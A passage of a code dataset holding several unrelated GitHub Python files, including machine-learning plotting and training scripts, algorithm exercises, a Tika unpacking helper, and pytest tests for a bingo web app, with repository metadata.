{}\".format(accuracy_score(flag_tst_y, flag_pred_y)))\n\nprint(\"Time elapsed: {}\".format(time() - start_time))\n\n\nfig_adult_lc = gp.plot_learning_curve(boost_adult,\n \"Adult - learning curve\",\n adult_x.todense(),\n adult_y.values.ravel(), cv=3,\n train_sizes=np.linspace(0.1, 1.0, 40))\nfig_adult_lc.savefig(root_path + \"/plots/boost/adult_lc.png\")\n\nfig_flag_lc = gp.plot_learning_curve(boost_flag,\n \"Flag - learning curve\",\n flag_x.todense(),\n flag_y.values.ravel(), cv=3,\n train_sizes=np.linspace(0.1, 1.0, 40))\nfig_flag_lc.savefig(root_path + \"/plots/boost/flag_lc.png\")\n\nprint(\"########## Plotting n_estimators Validation Curves... ##########\")\nfig_adult_vc1 = gp.plot_validation_curve(boost_adult,\n \"Adult - n_estimators Validation Curve\",\n adult_x.todense(),\n adult_y.values.ravel(),\n param_name=\"n_estimators\",\n param_range=range(1, 100, 2),\n cv=5)\nfig_adult_vc1.savefig(root_path + \"/plots/boost/n_estimators_adult_vc.png\")\n\nfig_flag_vc1 = gp.plot_validation_curve(boost_flag,\n \"Flag - n_estimators Validation Curve\",\n flag_x.todense(),\n flag_y.values.ravel(),\n param_name=\"n_estimators\",\n param_range=range(1, 100),\n cv=5)\nfig_flag_vc1.savefig(root_path + \"/plots/boost/n_estimators_flag_vc.png\")\n\nprint(\"########## Plotting learning_rate Validation Curves... ##########\")\nfig_adult_vc2 = gp.plot_validation_curve(boost_adult,\n \"Adult - learning_rate Validation Curve\",\n adult_x.todense(),\n adult_y.values.ravel(),\n param_name=\"learning_rate\",\n param_range=np.linspace(0.1, 1.5, 25),\n cv=5)\nfig_adult_vc2.savefig(root_path + \"/plots/boost/learning_rate_adult_vc.png\")\n\nfig_flag_vc2 = gp.plot_validation_curve(boost_flag,\n \"Flag - learning_rate Validation Curve\",\n flag_x.todense(),\n flag_y.values.ravel(),\n param_name=\"learning_rate\",\n param_range=np.linspace(0.01, 1, 25),\n cv=5)\nfig_flag_vc2.savefig(root_path + \"/plots/boost/learning_rate_flag_vc.png\")\n\n\nprint(\"Time elapsed: {}\".format(time() - start_time))\n","repo_name":"jdeweerth/ml_submissions","sub_path":"submissions/supervised_learning/boost.py","file_name":"boost.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41173184630","text":"#Challenge: Given an array and a number k where k is smaller than size of array, \n# we need to find the k’th smallest element in the given array. It is \n# given that array elements are distinct.\n\n#Idea: To modify quicksort algorithm to search for the kth smallest number\ndef partition(numbers, start, end):\n pivot = numbers[start]\n small_idx = start + 1\n for idx in range(start+1, end+1):\n if numbers[idx] < pivot:\n numbers[small_idx], numbers[idx] = numbers[idx], numbers[small_idx]\n small_idx += 1\n numbers[start], numbers[small_idx-1] = numbers[small_idx-1], numbers[start]\n return small_idx-1\n\ndef findKSmallestNumber(numbers, start, end, k):\n if start < end:\n pivot_idx = partition(numbers, start, end)\n if pivot_idx + 1 == k:\n return numbers[pivot_idx]\n elif pivot_idx + 1 > k:\n return findKSmallestNumber(numbers,start, pivot_idx-1, k)\n else:\n return findKSmallestNumber(numbers, pivot_idx+1, end, k)\n \nif __name__ == \"__main__\":\n assert findKSmallestNumber([7,10,4,3,20,15], 0, 5, 3) == 7\n print(\"===================================\")\n assert findKSmallestNumber([7,10,4,3,20,15], 0, 5, 4) == 10\n print(\"===================================\")\n assert findKSmallestNumber([12,3,5,7,19], 0, 4, 2) == 5\n ","repo_name":"edenuis/Python","sub_path":"Code Challenges/findKSmallestNumber.py","file_name":"findKSmallestNumber.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23387192521","text":"from sys import stdin\nimport numpy as np\n\n\n\n\nf = open('B-small-attempt0.txt','w')\nstdin = open('B-small-attempt0.in', 'r')\nT = int(stdin.next().strip())\nfor t in xrange(1,T+1):\n\tN, M = map(int, stdin.next().split())\n\tpattern = np.array([map(int, stdin.next().split()) for i in xrange(N)])\n\tlawn = np.empty([N,M])\n\t\n\tfor i in range(N):\n\t\tlawn[i,:] = np.max(pattern[i,:])\n\t\n\tfor j in range(M):\n\t\tif not (lawn[:,j] == pattern[:,j]).all():\n\t\t\tlawn[:,j] = np.max(pattern[:,j])\n\t\t\n\tresult = 'NO'\n\t\n\tif (lawn == pattern).all():\n\t\tresult = 'YES'\n\t\t\n\t#print 'Case #%d: %s' % (t, result)\t\t\t\n\tf.write(\"\"\"Case #\"\"\"), f.write(str(t)), f.write(\": \"), f.write(str(result)), f.write(\"\\n\")\n\nf.close()\t","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/1489.py","file_name":"1489.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40421544834","text":"from .tika import parse1, callServer, ServerEndpoint\nimport tarfile\nfrom io import BytesIO, TextIOWrapper\nimport csv\nfrom sys import version_info\nfrom contextlib import closing\n\n# Python 3 introduced .readable() to tarfile extracted files objects - this\n# is required to wrap a TextIOWrapper around the object. However, wrapping\n# with TextIOWrapper is only required for csv.reader() in Python 3, so the\n# tarfile returned object can be used as is in earlier versions.\n_text_wrapper = TextIOWrapper if version_info.major >= 3 else lambda x: x\n\n\ndef from_file(filename, serverEndpoint=ServerEndpoint, requestOptions={}):\n '''\n Parse from file\n :param filename: file\n :param serverEndpoint: Tika server end point (optional)\n :return:\n '''\n tarOutput = parse1('unpack', filename, serverEndpoint,\n responseMimeType='application/x-tar',\n services={'meta': '/meta', 'text': '/tika',\n 'all': '/rmeta/xml', 'unpack': '/unpack/all'},\n rawResponse=True, requestOptions=requestOptions)\n return _parse(tarOutput)\n\n\ndef from_buffer(string, serverEndpoint=ServerEndpoint, headers=None, requestOptions={}):\n '''\n Parse from buffered content\n :param string: buffered content\n :param serverEndpoint: Tika server URL (Optional)\n :return: parsed content\n '''\n\n headers = headers or {}\n headers.update({'Accept': 'application/x-tar'})\n\n status, response = callServer('put', serverEndpoint, '/unpack/all', string,\n headers, False,\n rawResponse=True, requestOptions=requestOptions)\n\n return _parse((status, response))\n\n\ndef _parse(tarOutput):\n parsed = {}\n if not tarOutput:\n return parsed\n elif tarOutput[1] is None or tarOutput[1] == b\"\":\n return parsed\n\n with tarfile.open(fileobj=BytesIO(tarOutput[1])) as tarFile:\n # get the member names\n memberNames = list(tarFile.getnames())\n\n # extract the metadata\n metadata = {}\n if \"__METADATA__\" in memberNames:\n memberNames.remove(\"__METADATA__\")\n\n metadataMember = tarFile.getmember(\"__METADATA__\")\n if not metadataMember.issym() and metadataMember.isfile():\n if version_info.major >= 3:\n with closing(_text_wrapper(tarFile.extractfile(metadataMember), encoding=tarFile.encoding)) as metadataFile:\n metadataReader = csv.reader(_truncate_nulls(metadataFile))\n for metadataLine in metadataReader:\n # each metadata line comes as a key-value pair, with list values\n # returned as extra values in the line - convert single values\n # to non-list values to be consistent with parser metadata\n assert len(metadataLine) >= 2\n\n if len(metadataLine) > 2:\n metadata[metadataLine[0]] = metadataLine[1:]\n else:\n metadata[metadataLine[0]] = metadataLine[1]\n else:\n with closing(_text_wrapper(tarFile.extractfile(metadataMember))) as metadataFile:\n metadataReader = csv.reader(_truncate_nulls(metadataFile))\n for metadataLine in metadataReader:\n # each metadata line comes as a key-value pair, with list values\n # returned as extra values in the line - convert single values\n # to non-list values to be consistent with parser metadata\n assert len(metadataLine) >= 2\n\n if len(metadataLine) > 2:\n metadata[metadataLine[0]] = metadataLine[1:]\n else:\n metadata[metadataLine[0]] = metadataLine[1]\n\n\n # get the content\n content = \"\"\n if \"__TEXT__\" in memberNames:\n memberNames.remove(\"__TEXT__\")\n\n contentMember = tarFile.getmember(\"__TEXT__\")\n if not contentMember.issym() and contentMember.isfile():\n if version_info.major >= 3:\n with closing(_text_wrapper(tarFile.extractfile(contentMember), encoding='utf8')) as content_file:\n content = content_file.read()\n else:\n with closing(tarFile.extractfile(contentMember)) as content_file:\n content = content_file.read().decode('utf8')\n\n # get the remaining files as attachments\n attachments = {}\n for attachment in memberNames:\n attachmentMember = tarFile.getmember(attachment)\n if not attachmentMember.issym() and attachmentMember.isfile():\n with closing(tarFile.extractfile(attachmentMember)) as attachment_file:\n attachments[attachment] = attachment_file.read()\n\n parsed[\"content\"] = content\n parsed[\"metadata\"] = metadata\n parsed[\"attachments\"] = attachments\n\n return parsed\n\n\n# TODO: Remove if/when fixed. https://issues.apache.org/jira/browse/TIKA-3070\ndef _truncate_nulls(s):\n for line in s:\n yield line.replace('\\0', '')\n","repo_name":"chrismattmann/tika-python","sub_path":"tika/unpack.py","file_name":"unpack.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","stars":1359,"dataset":"github-code","pt":"61"} +{"seq_id":"29172486752","text":"import os\nimport tempfile\nfrom itertools import product\nimport pytest\nfrom freezegun import freeze_time\nfrom datetime import datetime, timedelta\nfrom random import randint\n\nfrom main import app, db\n\n\n@pytest.fixture\ndef client():\n db_fd, db_file = tempfile.mkstemp()\n app.config['DATABASE'] = \"sqlite:///\" + db_file\n app.config['TESTING'] = True\n with app.test_client() as client:\n with app.app_context():\n db.get_session() # Initialize db\n yield client\n\n os.close(db_fd)\n os.unlink(db_file)\n\n\ndef test_basic_functionality(client):\n \"\"\"Sanity test to see if everything works as intended\"\"\"\n with app.app_context():\n # Create a field\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=\"player\"))\n game_link = rv.location[-11:-1]\n session = db.get_session()\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: player' in rv.data\n # Wait 15 minutes\n frozen_time.tick(delta=timedelta(minutes=15))\n # Check middle\n rv = client.post(f'/{game_link}/submit/3/3/')\n assert {'data': 'success', 'x': 3, 'y': 3} == rv.get_json()\n # Check if it's submitted to the db\n square_time = session.query(db.BingoSquares.check_time).filter(\n db.BingoSquares.bingo_field_id == game_pk, db.BingoSquares.x_position == 3, db.BingoSquares.y_position == 3\n ).one()[0]\n assert square_time is not None\n # Wait 15 minutes\n frozen_time.tick(delta=timedelta(minutes=15))\n # Uncheck middle\n rv = client.post(f'/{game_link}/submit/3/3/undo/')\n assert {'data': 'success', 'x': 3, 'y': 3} == rv.get_json()\n # Check if it's submitted to the db\n square_time = session.query(db.BingoSquares.check_time).filter(\n db.BingoSquares.bingo_field_id == game_pk, db.BingoSquares.x_position == 3, db.BingoSquares.y_position == 3\n ).one()[0]\n assert square_time is None\n # Now randomly check a field every hour until we have a bingo\n bingo = False\n checked = []\n minutes_passed = 30\n while not bingo:\n frozen_time.tick(delta=timedelta(hours=1))\n minutes_passed += 60\n # Search for an unchecked field\n unchecked_field = False\n while not unchecked_field:\n x = randint(1, 5)\n y = randint(1, 5)\n if [x, y] not in checked:\n unchecked_field = True\n checked.append([x, y])\n # Check the field\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n json_data = rv.get_json()\n # Check if it's submitted to the db\n square_time = session.query(db.BingoSquares.check_time).filter(\n db.BingoSquares.bingo_field_id == game_pk, db.BingoSquares.x_position == x,\n db.BingoSquares.y_position == y\n ).one()[0]\n assert square_time is not None\n\n if json_data['data'] == \"success\":\n assert {'data': 'success', 'x': x, 'y': y} == json_data\n elif json_data['data'] == \"finished\":\n assert {'data': 'finished', 'score': int(1000000 / minutes_passed)} == json_data\n # Check if the field is finished and the score is saved in the db\n game = session.query(db.BingoField).filter(db.BingoField.id == game_pk).one()\n assert game.finished\n assert game.score == int(1000000 / minutes_passed)\n # Finish the while-loop\n bingo = True\n\n\ndef test_timezone_submit(client):\n with app.app_context():\n # Test both DST time and non DST time\n for dst, tz_time in [[True, datetime(2019, 6, 15, 12)], [False, datetime(2019, 12, 15, 12)]]: # This is UTC time\n with freeze_time(tz_time) as frozen_time:\n # Create a field\n rv = client.post('/', data=dict(player_name=\"player\"))\n game_link = rv.location[-11:-1]\n session = db.get_session()\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: player' in rv.data\n # Check if the right tz is displayed CEST in DST CET otherwise\n if dst:\n assert b'Start-Zeit: 15.06.19 14:00 Uhr' in rv.data\n else:\n assert b'Start-Zeit: 15.12.19 13:00 Uhr' in rv.data\n # Check if the right tz was saved CEST in DST CET otherwise\n db_time = session.query(db.BingoField.start_time).filter(db.BingoField.id == game_pk).one()[0]\n if dst:\n assert db_time == tz_time + timedelta(hours=2)\n else:\n assert db_time == tz_time + timedelta(hours=1)\n # Wait an hour\n frozen_time.tick(delta=timedelta(hours=1))\n # Check a square\n rv = client.post(f'/{game_link}/submit/3/3/')\n assert {'data': 'success', 'x': 3, 'y': 3} == rv.get_json()\n rv = client.get(f'/{game_link}/')\n # Check if the right tz is displayed with the checked square\n if dst:\n assert b'

Zeit: 15.06.19 15:00 Uhr

' in rv.data # Bingo Squares's html looks like this\n else:\n assert b'

Zeit: 15.12.19 14:00 Uhr

' in rv.data\n # Check if the right tz is displayed in the db\n db_time = session.query(db.BingoSquares.check_time).filter(\n db.BingoSquares.bingo_field_id == game_pk, db.BingoSquares.x_position == 3,\n db.BingoSquares.y_position == 3\n ).one()[0]\n if dst:\n assert db_time == tz_time + timedelta(hours=3)\n else:\n assert db_time == tz_time + timedelta(hours=2)\n\n\ndef test_cheater_prevention(client):\n \"\"\" Check whether fields finished within 2 hours are detected as cheaters \"\"\"\n with app.app_context():\n # Create a field\n rv = client.post('/', data=dict(player_name=\"cheater\"))\n game_link = rv.location[-11:-1]\n session = db.get_session()\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: cheater' in rv.data\n # Tick five fields right now\n for x, y in product((1, 1, 1, 1), (1, 2, 3, 4)):\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n assert {'data': 'success', 'x': x, 'y': y} == rv.get_json()\n rv = client.post(f'/{game_link}/submit/1/5/')\n assert {'data': 'cheater'} == rv.get_json()\n # Check if field has been deleted\n assert 0 == session.query(db.BingoField).filter(db.BingoField.id == game_pk).count()\n assert 0 == session.query(db.BingoSquares).filter(db.BingoSquares.bingo_field_id == game_pk).count()\n\n # Tick five fields after 1:55 hours\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=\"cheater155\"))\n game_link = rv.location[-11:-1]\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: cheater155' in rv.data\n # Wait 1:55 hours\n frozen_time.tick(delta=timedelta(hours=1, minutes=55))\n # Tick five fields now\n for x, y in product((1, 1, 1, 1), (1, 2, 3, 4)):\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n assert {'data': 'success', 'x': x, 'y': y} == rv.get_json()\n rv = client.post(f'/{game_link}/submit/1/5/')\n assert {'data': 'cheater'} == rv.get_json()\n # Check if field has been deleted\n assert 0 == session.query(db.BingoField).filter(db.BingoField.id == game_pk).count()\n assert 0 == session.query(db.BingoSquares).filter(db.BingoSquares.bingo_field_id == game_pk).count()\n\n # Tick four fields after 1:55 hours and fifth after 2:05 hours – Should pass\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=\"legit\"))\n game_link = rv.location[-11:-1]\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: legit' in rv.data\n # Wait 1:55 hours\n frozen_time.tick(delta=timedelta(hours=1, minutes=55))\n # Tick four fields now\n for x, y in product((1, 1, 1, 1), (1, 2, 3, 4)):\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n assert {'data': 'success', 'x': x, 'y': y} == rv.get_json()\n # Wait 10 minutes\n frozen_time.tick(delta=timedelta(minutes=10))\n rv = client.post(f'/{game_link}/submit/1/5/')\n assert {'data': 'finished', 'score': (1000000/125)} == rv.get_json()\n # Check if field is finished\n game = session.query(db.BingoField).filter(db.BingoField.id == game_pk).one()\n assert game.score == 1000000 / 125\n assert game.finished\n\n\ndef test_bingo_scoring(client):\n \"\"\" Test whether score matches our expectations\"\"\"\n with app.app_context():\n # Check scores after 3, 5, 24, 48, 96, 300 and 700 hours (after that the cookie expired)\n for hours in [3, 5, 24, 48, 96, 300, 700]:\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=f\"{hours}hour\"))\n game_link = rv.location[-11:-1]\n session = db.get_session()\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert f'Spieler: {hours}hour'.encode() in rv.data\n # Wait some hours\n frozen_time.tick(delta=timedelta(hours=hours))\n # Create a bingo\n for x, y in product((1, 1, 1, 1), (1, 2, 3, 4)):\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n assert {'data': 'success', 'x': x, 'y': y} == rv.get_json()\n rv = client.post(f'/{game_link}/submit/1/5/')\n assert {'data': 'finished', 'score': int(1000000 / (60*hours))} == rv.get_json()\n # Check if field is finished and score matches our expectation\n game = session.query(db.BingoField).filter(db.BingoField.id == game_pk).one()\n assert game.score == int(1000000 / (60*hours))\n assert game.finished\n\n\ndef test_cron(client):\n \"\"\"Test if /cron/ cleans up properly\"\"\"\n with app.app_context():\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=\"dead\"))\n dead_link = rv.location[-11:-1]\n session = db.get_session()\n dead_pk = session.query(db.BingoField.id).filter(db.BingoField.link == dead_link).one()[0]\n rv = client.get(f'/{dead_link}/')\n assert b'Spieler: dead' in rv.data\n rv = client.post('/', data=dict(player_name=\"cookie\"))\n cookie_link = rv.location[-11:-1]\n session = db.get_session()\n rv = client.get(f'/{cookie_link}/')\n assert b'Spieler: cookie' in rv.data\n rv = client.post(f'/{cookie_link}/submit/3/3/')\n assert {'data': 'success', 'x': 3, 'y': 3} == rv.get_json()\n # Wait seven days\n frozen_time.tick(delta=timedelta(days=8))\n rv = client.get('/cron/')\n assert {'data': 'success', 'finished': [dead_link]} == rv.get_json()\n # Check if the dead game has been deleted\n assert 0 == session.query(db.BingoField).filter(db.BingoField.id == dead_pk).count()\n assert 0 == session.query(db.BingoSquares).filter(db.BingoSquares.bingo_field_id == dead_pk).count()\n # Check if the slow game is still there\n assert 1 == session.query(db.BingoField).filter(db.BingoField.link == cookie_link).count()\n # Wait some more days\n frozen_time.tick(delta=timedelta(days=60))\n # Check another field for the cookie game\n rv = client.post(f'/{cookie_link}/submit/2/3/')\n assert {'data': 'success', 'x': 2, 'y': 3} == rv.get_json()\n # Wait a some time\n frozen_time.tick(delta=timedelta(days=40))\n # Game should NOT be finished now\n rv = client.get('/cron/')\n assert {'data': 'success', 'finished': []} == rv.get_json()\n assert 1 == session.query(db.BingoField).filter(db.BingoField.link == cookie_link).count()\n # Wait a long time now (game is dead)\n frozen_time.tick(delta=timedelta(days=100))\n rv = client.get('/cron/')\n assert {'data': 'success', 'finished': [cookie_link]} == rv.get_json()\n assert session.query(db.BingoField.finished).filter(db.BingoField.link == cookie_link).one()[0]\n assert session.query(db.BingoField.score).filter(db.BingoField.link == cookie_link).one()[0] is None\n","repo_name":"Niduroki/bahn-bingo","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":13921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25240459956","text":"# 16.12\n# 使用csv.DictWriter对象写入csv文件\nimport csv\n\n\ndef writecsv2(csvfilepath):\n headers = [\"name\", \"age\", \"\", \"\", \"\"]\n rows = [{\"name\": \"zhangsan\", \"age\": 20}, {\"name\": \"lisi\", \"age\": 30}]\n with open(csvfilepath, \"w\", newline=\"\") as f:\n f_csv = csv.DictWriter(f, fieldnames=headers)\n f_csv.writeheader(headers)\n f_csv.writerows(rows)\n\n\nif __name__ == \"__main__\":\n writecsv2(r\"d:\\pythonpa\\test.csv\")\n","repo_name":"Oxidaner/python-exercises-answers","sub_path":"myclass/16.0/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23008677185","text":"import os\r\nimport sys\r\nimport getopt\r\nfrom typing import Dict\r\n\r\nfrom thebox.common.config import Config\r\nfrom thebox.common_svc.logging import setup_service_logger\r\nfrom thebox.common_svc.api_service_wrapper import create_app, APIResource\r\n\r\nimport thebox.orchestrator.orchestrator_api as api\r\nimport thebox.orchestrator.orchestrator_service as svc\r\n\r\ndef parse_arguments(args) -> Dict:\r\n \"\"\"Parse commandline arguments and return a dictionary of arguments\r\n \r\n Arguments:\r\n args {[type]} -- Arguments passed from CLI\r\n \r\n Returns:\r\n Dict -- dictionary of supported config values; None if invalid commands\r\n\r\n \"\"\"\r\n\r\n try:\r\n opts, args = getopt.getopt(args, \"hc:\", [\"config=\"])\r\n except getopt.GetoptError:\r\n return None\r\n\r\n parsed_args = {}\r\n\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n printhelp()\r\n sys.exit()\r\n elif opt in (\"-c\", \"--config\"):\r\n parsed_args['config'] = arg\r\n\r\n return parsed_args\r\n\r\ndef print_help():\r\n print(\"\"\"\r\nUsage:\r\n python3 -m thebox_orchestrator [-c|--config ]\r\n \"\"\")\r\n\r\ndef main(args=None):\r\n\r\n parsed_args = parse_arguments(args)\r\n if parsed_args is None:\r\n print_help()\r\n\r\n default_cfg_path = os.path.join(os.path.dirname(__file__), \"config.yml\")\r\n cfg_path = parsed_args.get('config', default_cfg_path)\r\n cfg = Config(cfg_path)\r\n\r\n log = setup_service_logger(verbose=True)\r\n log.debug(f\"Starting up using config '{cfg_path}' ...\")\r\n\r\n api_resources = [\r\n APIResource(\r\n api.OrchestrationServiceAPI, \r\n '/scenario',\r\n svc.OrchestrationService(cfg)\r\n )\r\n ]\r\n\r\n app = create_app(\"ochestrator\", api_resources)\r\n app.run(host='0.0.0.0', debug=True)\r\n\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv[1:])\r\n","repo_name":"bhairavmehta2016/enterprisenew","sub_path":"thebox/services/src/thebox/orchestrator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35580290022","text":"from math import sqrt\r\n\r\n\r\n\r\ndef delta(a, b, c):\r\n return (b**2 - 4 * a * c)\r\n\r\ndef main():\r\n #calcula as raizes de uma equação de segundo grau\r\n a = float(input('Entre com o índice \"a\": '))\r\n b = float(input('Entre com o índice \"b\": '))\r\n c = float(input('Entre com o índice \"c\": '))\r\n imprime_raizes(a, b, c)\r\n\r\ndef imprime_raizes(a, b, c):\r\n d = delta(a, b, c)\r\n if d < 0:\r\n print('\\nNão existe solução real possível \\nas raizes são imaginárias.')\r\n if d == 0:\r\n r = -b/(2*a)\r\n print(\"\"\"Existe uma única raiz \\ne vale:\r\n r = {:.3f}\"\"\".format(r))\r\n if d > 0:\r\n r1 = (-b + sqrt(d))/(2*a)\r\n r2 = (-b - sqrt(d))/(2*a)\r\n print(\"\"\"As raizes são Reais \\ne valem:\r\n r1 = {:.3f}\r\n r2 = {:.3f}\"\"\".format(r1, r2))\r\n","repo_name":"Arduinobymyself/COURSERA","sub_path":"semana 5 - equacao_segundo_grau.py","file_name":"semana 5 - equacao_segundo_grau.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"21792729991","text":"import dgl\nfrom utils import *\nfrom model import *\nfrom tqdm import tqdm\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport dgl.nn.pytorch as dglnn\nfrom sklearn.metrics import roc_auc_score, f1_score\nimport warnings\nimport os\nfrom sklearn.metrics.pairwise import cosine_similarity as cos\n\nwarnings.filterwarnings(\"ignore\")\nseed = 47\nargs = setup(default_configure,seed)\ns = 47\nin_size = 512\nhidden_size = 256\nout_size = 128\ndropout = 0.5\nlr = 0.0001\nweight_decay = 1e-10\nepochs = 1000\ncl_loss_co = 1\nreg_loss_co = 0.0001\nfold = 0\ndir = \"../modelSave\"\n\nargs['device'] = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n\n\n\ndtidata, graph, num, all_meta_paths = load_dataset(\"../data/\")\n\n\ndti_label = torch.tensor(dtidata[:, 2:3]).to(args['device'])\n\n\n#torch.Tensor().long()\n#高斯初始化\nnum_protein = 2694\nnum_drug = 2634\n\nhd = torch.randn((num_drug, in_size))\nhp = torch.randn((num_protein, in_size))\nfeatures_d = hd.to(args['device'])\nfeatures_p = hp.to(args['device'])\nnode_feature = [features_d, features_p]\n#得到边的关系\ndti_cl = get_clGraph(dtidata, \"dti\").to(args['device'])\n\ncl = dti_cl\ndata = dtidata\nlabel = dti_label\n\n\ndef main(tr,te,seed):\n all_acc = []\n all_roc = []\n all_pr = []\n for i in range(len(tr)):\n f = open(f\"{i}foldtrain.txt\",\"w\",encoding=\"utf-8\")\n train_index = tr[i]\n for train_index_one in train_index:\n f.write(f\"{train_index_one}\\n\")\n test_index = te[i]\n f = open(f\"{i}foldtest.txt\",\"w\",encoding=\"utf-8\")\n for train_index_one in test_index:\n f.write(f\"{train_index_one}\\n\")\n model = DMNDTI(\n num_drug=num_drug,\n num_protein=num_protein,\n all_meta_paths=all_meta_paths,\n in_size=[hd.shape[1], hp.shape[1]],\n hidden_size=[hidden_size, hidden_size],\n hidden_size1 = out_size,\n out_size=[out_size, out_size],\n dropout=dropout,\n ).to(args['device'])\n # model.load_state_dict(torch.load(f\"{dir}/net{i}.pth\"))\n optim = torch.optim.Adam(lr=lr, weight_decay=weight_decay, params=model.parameters())\n best_acc = 0\n best_pr = 0\n best_roc = 0\n for epoch in tqdm(range(epochs)):\n loss, train_acc, task1_roc, task1_pr,test_acc, test_roc, test_pr = train(model,optim,\n train_index,\n test_index,\n epoch, i)\n\n if test_acc > best_acc:\n best_acc = test_acc\n if test_pr > best_pr:\n best_pr = test_pr\n if test_roc > best_roc:\n best_roc = test_roc\n # torch.save(obj=model.state_dict(), f=f\"{dir}/net.pth\")\n\n all_acc.append(best_acc)\n all_roc.append(best_roc)\n all_pr.append(best_pr)\n print(f\"fold{i} auroc is {best_roc:.4f} aupr is {best_pr:.4f} \")\n\n print(f\"{sum(all_acc) / len(all_acc):.4f}, {sum(all_roc) / len(all_roc):.4f} ,{sum(all_pr) / len(all_pr):.4f}\")\n\ndef train(model, optim,train_index,test_index, epoch,fold):\n model.train()\n d, p, out = model(graph, node_feature, train_index, data)\n train_acc = (out.argmax(dim=1) == label[train_index].reshape(-1)).sum(dtype=float) / len(train_index)\n\n task1_roc = get_roc(out, label[train_index])\n task1_pr = get_pr(out, label[train_index])\n\n loss = F.nll_loss(out, label[train_index].reshape(-1).long())\n optim.zero_grad()\n loss.backward()\n optim.step()\n print(f\" {epoch} epoch loss {loss:.4f} train is acc {train_acc:.4f}, train roc is {task1_roc:.4f},train pr is{task1_pr}\")\n te_acc, te_task1_roc1, te_task1_pr = main_test(model, d, p, test_index, epoch, fold)\n\n return loss.item(), train_acc, task1_roc, task1_pr, te_acc, te_task1_roc1, te_task1_pr\n\n\ndef main_test(model, d, p, test_index, epoch, fold):\n model.eval()\n # model(graph, node_feature, train_index, data)\n out = model(graph, node_feature, test_index, data, iftrain=False, d=d, p=p)\n\n acc1 = (out.argmax(dim=1) == label[test_index].reshape(-1)).sum(dtype=float) / len(test_index)\n\n task_roc = get_roc(out, label[test_index])\n\n task_pr = get_pr(out, label[test_index])\n\n return acc1, task_roc, task_pr\n\n\ntrain_indeces, test_indeces = get_cross(dtidata)\nmain(train_indeces, test_indeces, seed)\n","repo_name":"ningq669/DMNDTI","sub_path":"dtiseed/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19068704182","text":"#!/usr/bin/env python\n# encoding=utf-8\n\nimport socket\n\ndef convert_integer():\n data = 1234\n\n # 32-bits, n:network, h:host l:long\n host_byte_32 = socket.ntohl(data)\n net_byte_32 = socket.htonl(data)\n print(\"Original: {} => Long host byte order: {}, network byte order: {}\".format(data, host_byte_32, net_byte_32))\n\n # 16-bits, 和上面的一样\n host_byte_16 = socket.ntohs(data)\n net_byte_16 = socket.htons(data)\n print(\"Original: {} => short host byte order: {}, network byte order: {}\".format(data, host_byte_16, net_byte_16))\n\n\nif __name__ == \"__main__\":\n convert_integer()","repo_name":"wwxFromTju/python-network","sub_path":"base/convert_integer.py","file_name":"convert_integer.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10603890128","text":"import os\nimport boto3\nimport json\nimport datetime\nimport logging\nfrom backend.common.validators import validate\nfrom backend.handlers.comments.commentService import get_single_comment\n\n# Create a logger object to log the events\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndynamodb = boto3.resource(\"dynamodb\")\ns3c = boto3.client(\"s3\")\n\nresponse = {\n \"statusCode\": 200,\n \"body\": \"\",\n \"headers\": {\n \"Content-Type\": \"application/json\",\n \"Access-Control-Allow-Credentials\": True,\n 